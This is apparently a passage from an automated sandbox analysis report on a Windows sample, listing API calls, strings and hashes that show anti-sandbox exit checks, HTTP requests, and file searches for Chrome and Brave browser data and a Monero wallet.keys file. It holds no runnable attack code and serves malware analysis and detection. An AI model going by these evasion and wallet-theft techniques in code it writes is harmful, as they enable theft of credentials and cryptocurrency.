                    APIs
                      • Part of subcall function 0064A820: lstrlen.KERNEL32(00634F05,?,?,00634F05,00650DDE), ref: 0064A82B
                      • Part of subcall function 0064A820: lstrcpy.KERNEL32(00650DDE,00000000), ref: 0064A885
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00645644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006456A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00645857
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00645228
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 006452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00645318
                      • Part of subcall function 006452C0: lstrlen.KERNEL32(00000000), ref: 0064532F
                      • Part of subcall function 006452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00645364
                      • Part of subcall function 006452C0: lstrlen.KERNEL32(00000000), ref: 00645383
                      • Part of subcall function 006452C0: lstrlen.KERNEL32(00000000), ref: 006453AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0064578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00645940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00645A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00645A1B
                    Strings
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: aa565ad9f4f52b18082d0d5b7e3309b85da843fb632ea07153fed06c443a4f24
                    • Instruction ID: 7ec515429a8bbffb99872769a0329a2820def20e79008669ffcc16127b3c579f
                    • Opcode Fuzzy Hash: aa565ad9f4f52b18082d0d5b7e3309b85da843fb632ea07153fed06c443a4f24
                    • Instruction Fuzzy Hash: DBE14072950104ABDB58FBE0DC96AED733BBF95300F40812CB50766196EF34AB49CB96

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    • Graph of function 6417a0 (basic-block edge list not rendered here)
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 006417C5
                    • ExitProcess.KERNEL32 ref: 006417D1
                    Strings
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: d1b3c7de53648eb632caf47f2618c984d3fe8d27f524b9fdf56749f9f9363322
                    • Instruction ID: a1a1065e8b8ded0b52009e97946ab0977c24a0ed6cde0d87e888c84d9321f54e
                    • Opcode Fuzzy Hash: d1b3c7de53648eb632caf47f2618c984d3fe8d27f524b9fdf56749f9f9363322
                    • Instruction Fuzzy Hash: DC515EB5B1420AEFDB04DFA0D964ABE77B6BF45704F108058E806AB340D770E996CF62

                    Control-flow Graph

                    • Graph (rendered as an image in the original report; executed and not-executed blocks are colour-coded): function at 00647500, basic blocks 647500-64768e, calling GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA plus subroutines 648d00 and 64a740.
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00647542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0064757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0064760A
                    • wsprintfA.USER32 ref: 00647640
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\$e
                    • API String ID: 1544550907-2952404552
                    • Opcode ID: 032051f235db6f256f823d9b58d1d31bd27afd526100487f3115580b01e81505
                    • Instruction ID: bd2e4027d3fdf14889e7df7ee459a239612782af301032089ee2fdcd09042968
                    • Opcode Fuzzy Hash: 032051f235db6f256f823d9b58d1d31bd27afd526100487f3115580b01e81505
                    • Instruction Fuzzy Hash: 4141B3B1D04248ABDF14DF94DC45BEEBBB9FF48704F100098F50967280DB74AA84CBA5

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443018), ref: 006498A1
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443210), ref: 006498BA
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443138), ref: 006498D2
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443180), ref: 006498EA
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443270), ref: 00649903
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01449F18), ref: 0064991B
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01435870), ref: 00649933
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01435810), ref: 0064994C
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443240), ref: 00649964
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443078), ref: 0064997C
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,014431F8), ref: 00649995
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443288), ref: 006499AD
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,014358F0), ref: 006499C5
                      • Part of subcall function 00649860: GetProcAddress.KERNEL32(74DD0000,01443258), ref: 006499DE
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 006311D0: ExitProcess.KERNEL32 ref: 00631211
                      • Part of subcall function 00631160: GetSystemInfo.KERNEL32(?), ref: 0063116A
                      • Part of subcall function 00631160: ExitProcess.KERNEL32 ref: 0063117E
                      • Part of subcall function 00631110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0063112B
                      • Part of subcall function 00631110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00631132
                      • Part of subcall function 00631110: ExitProcess.KERNEL32 ref: 00631143
                      • Part of subcall function 00631220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0063123E
                      • Part of subcall function 00631220: ExitProcess.KERNEL32 ref: 00631294
                      • Part of subcall function 00646770: GetUserDefaultLangID.KERNEL32 ref: 00646774
                      • Part of subcall function 00631190: ExitProcess.KERNEL32 ref: 006311C6
                      • Part of subcall function 00647850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006311B7), ref: 00647880
                      • Part of subcall function 00647850: RtlAllocateHeap.NTDLL(00000000), ref: 00647887
                      • Part of subcall function 00647850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0064789F
                      • Part of subcall function 006478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647910
                      • Part of subcall function 006478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00647917
                      • Part of subcall function 006478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0064792F
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01449FF8,?,0065110C,?,00000000,?,00651110,?,00000000,00650AEF), ref: 00646ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00646AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00646AF9
                    • Sleep.KERNEL32(00001770), ref: 00646B04
                    • CloseHandle.KERNEL32(?,00000000,?,01449FF8,?,0065110C,?,00000000,?,00651110,?,00000000,00650AEF), ref: 00646B1A
                    • ExitProcess.KERNEL32 ref: 00646B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2931873225-0
                    • Opcode ID: 0b0f29a3cba93b4dda9abcb2868a1f9ee60ad200434961c60dff8a0768fcbf71
                    • Instruction ID: 642132a5522d98f75549f7b69b1fcc1b0b5133c5e1fb9b3e279fd33db5df4d2d
                    • Opcode Fuzzy Hash: 0b0f29a3cba93b4dda9abcb2868a1f9ee60ad200434961c60dff8a0768fcbf71
                    • Instruction Fuzzy Hash: C1313E70950208BAEB88FBF0DC56BEE777AFF45341F00452CF612A6182DF706945C6AA

                    Control-flow Graph

                    • Graph (rendered as an image in the original report; executed and not-executed blocks are colour-coded): function fragment at 00646AF3, basic blocks 646aba-646b22, calling OpenEventA, CreateEventA, CloseHandle, Sleep and ExitProcess plus subroutines 64aad0, 646920 and 645b10.
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01449FF8,?,0065110C,?,00000000,?,00651110,?,00000000,00650AEF), ref: 00646ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00646AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00646AF9
                    • Sleep.KERNEL32(00001770), ref: 00646B04
                    • CloseHandle.KERNEL32(?,00000000,?,01449FF8,?,0065110C,?,00000000,?,00651110,?,00000000,00650AEF), ref: 00646B1A
                    • ExitProcess.KERNEL32 ref: 00646B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: 0b6839cd838540379814cdca721a947a1fa9f9a1fbdccc6908a1dd3fac21484d
                    • Instruction ID: d94f6813d9c13335d700c66343b028fed51d154367f7af6f379548ef9aa0bfbf
                    • Opcode Fuzzy Hash: 0b6839cd838540379814cdca721a947a1fa9f9a1fbdccc6908a1dd3fac21484d
                    • Instruction Fuzzy Hash: 4CF08270940219AFE744ABA0DD0ABBD7B76FB06741F104918F917E11C5CBB095C1D65B

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 70e56e34d2ae5eb7ef186829bd9242aae4cfe7b4517206bd26cca5934005a942
                    • Instruction ID: 073af1ffb82c87a59747e5c72b85a78916442072522f46e010611d705c0d039f
                    • Opcode Fuzzy Hash: 70e56e34d2ae5eb7ef186829bd9242aae4cfe7b4517206bd26cca5934005a942
                    • Instruction Fuzzy Hash: D4214FB1D00209ABDF14DFA4E849ADE7B75FB45320F108629F959A72C1EB706A05CF91

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 00636280: InternetOpenA.WININET(00650DFE,00000001,00000000,00000000,00000000), ref: 006362E1
                      • Part of subcall function 00636280: StrCmpCA.SHLWAPI(?,014507B0), ref: 00636303
                      • Part of subcall function 00636280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00636335
                      • Part of subcall function 00636280: HttpOpenRequestA.WININET(00000000,GET,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00636385
                      • Part of subcall function 00636280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006363BF
                      • Part of subcall function 00636280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006363D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00645228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: a8cbbbe75b5aa28209f03748a8a0082563c962dfbc2ea9d74baae12eea975f0b
                    • Instruction ID: 194d91e7e95756fc04db195895eb024eccf5e7e49ca5fd4ec4a29b632f22944a
                    • Opcode Fuzzy Hash: a8cbbbe75b5aa28209f03748a8a0082563c962dfbc2ea9d74baae12eea975f0b
                    • Instruction Fuzzy Hash: 56113070940108BBEB54FFA0DD52AED733AAF50300F40415CF80B5B192EF30AB06CA96

                    Control-flow Graph

                    • Graph (rendered as an image in the original report; executed and not-executed blocks are colour-coded): function at 00631220, basic blocks 631220-63129d, calling GlobalMemoryStatusEx and ExitProcess plus subroutines 6489b0 and 64da00.
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0063123E
                    • ExitProcess.KERNEL32 ref: 00631294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 803317263-2766056989
                    • Opcode ID: e6efc889250bf0446aa6d6da79016c823cacdb82793a996f90123a99e764e676
                    • Instruction ID: 31be10a428f8c3da4e0bbdab57138cc94904222b5643c2e75d75ebcf53ea1eba
                    • Opcode Fuzzy Hash: e6efc889250bf0446aa6d6da79016c823cacdb82793a996f90123a99e764e676
                    • Instruction Fuzzy Hash: 8B016DB0D40308BBEB10EFE4CC49B9EBB79BB05705F208048E705BA2C0D77496818799
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00647917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0064792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: 146b9d1de7a662fac774fffb2466d1f246fb8f30d0ca147b4ac50b2ed45349e4
                    • Instruction ID: 26f6423adcf6c13931ab103fc01a025f39d1406d7a446d085441aba92105c059
                    • Opcode Fuzzy Hash: 146b9d1de7a662fac774fffb2466d1f246fb8f30d0ca147b4ac50b2ed45349e4
                    • Instruction Fuzzy Hash: E601A9B1A04204EFC704DF94DD49BAEBBB8F744B11F104269F955E3380D37559448BA2
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0063112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00631132
                    • ExitProcess.KERNEL32 ref: 00631143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: 8bf967c960280b3cb5e82ee4dce58125627cddd10621414ba9ae34fea34e7d66
                    • Instruction ID: e2d0fd1d63822dedb263ec93f2cb139557207337dda9a7ea30426b4e18d0f8cc
                    • Opcode Fuzzy Hash: 8bf967c960280b3cb5e82ee4dce58125627cddd10621414ba9ae34fea34e7d66
                    • Instruction Fuzzy Hash: CCE0867094930CFBE7146BA09C0EB4C7678BB44B02F100054F70C7A1C0CAB4664096DA
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006310B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006310F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: d4c93c9ac242acb7bcbecb17fe41fd71942f32ab8b0fa9ba5ad907ab312229a0
                    • Instruction ID: 85f7e79a9edbc622cdae34578567b57dc8c7e58173d5d4e30bb28ba196c427fb
                    • Opcode Fuzzy Hash: d4c93c9ac242acb7bcbecb17fe41fd71942f32ab8b0fa9ba5ad907ab312229a0
                    • Instruction Fuzzy Hash: D3F0E971641204BBE71896A49C49FAEB7DCE705715F300448F504E7380D5719E40CAA5
                    APIs
                      • Part of subcall function 006478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647910
                      • Part of subcall function 006478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00647917
                      • Part of subcall function 006478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0064792F
                      • Part of subcall function 00647850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006311B7), ref: 00647880
                      • Part of subcall function 00647850: RtlAllocateHeap.NTDLL(00000000), ref: 00647887
                      • Part of subcall function 00647850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0064789F
                    • ExitProcess.KERNEL32 ref: 006311C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: 5723f00d89809ec2d1b5c45e251cb893b6c337da0b068ea312a5af753442e6b4
                    • Instruction ID: 992641a11506c99b4263cc70047e416f75431bbefb6d33f3efd5eeb3670a0436
                    • Opcode Fuzzy Hash: 5723f00d89809ec2d1b5c45e251cb893b6c337da0b068ea312a5af753442e6b4
                    • Instruction Fuzzy Hash: 77E012B5D143055BCB4477F0BC0EB6E329E6B55746F04083CFA09D7602FA65E84086AE
                    APIs
                    • wsprintfA.USER32 ref: 006438CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 006438E3
                    • lstrcat.KERNEL32(?,?), ref: 00643935
                    • StrCmpCA.SHLWAPI(?,00650F70), ref: 00643947
                    • StrCmpCA.SHLWAPI(?,00650F74), ref: 0064395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00643C67
                    • FindClose.KERNEL32(000000FF), ref: 00643C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: 2cb85b8d3003ab26c5373eb29f1228cdb9fa6729c8d2d197f103cfb2e6a97802
                    • Instruction ID: cab60d190722965d57f479f859c5642813eed581aa7094d281b6bbd8351ed6d4
                    • Opcode Fuzzy Hash: 2cb85b8d3003ab26c5373eb29f1228cdb9fa6729c8d2d197f103cfb2e6a97802
                    • Instruction Fuzzy Hash: 84A162B1900218AFDB64EFA4DC89FEE7379BF94301F044588A50D96245EB749B84CFA2
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00650B32,00650B2B,00000000,?,?,?,006513F4,00650B2A), ref: 0063BEF5
                    • StrCmpCA.SHLWAPI(?,006513F8), ref: 0063BF4D
                    • StrCmpCA.SHLWAPI(?,006513FC), ref: 0063BF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063C7BF
                    • FindClose.KERNEL32(000000FF), ref: 0063C7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: b92ae7ec32c53b3badbc6841967d3cd8e013ea74d9896caea1ec06b594eff096
                    • Instruction ID: 87214b060832845820235d87b0157055c42cece1062475e5868ae954a3f085c9
                    • Opcode Fuzzy Hash: b92ae7ec32c53b3badbc6841967d3cd8e013ea74d9896caea1ec06b594eff096
                    • Instruction Fuzzy Hash: D3427372950104BBEB54FBB0DC96EED737EAF94300F40455CB90AA6181EE349B49CBA6
                    APIs
                    • wsprintfA.USER32 ref: 0064492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00644943
                    • StrCmpCA.SHLWAPI(?,00650FDC), ref: 00644971
                    • StrCmpCA.SHLWAPI(?,00650FE0), ref: 00644987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00644B7D
                    • FindClose.KERNEL32(000000FF), ref: 00644B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
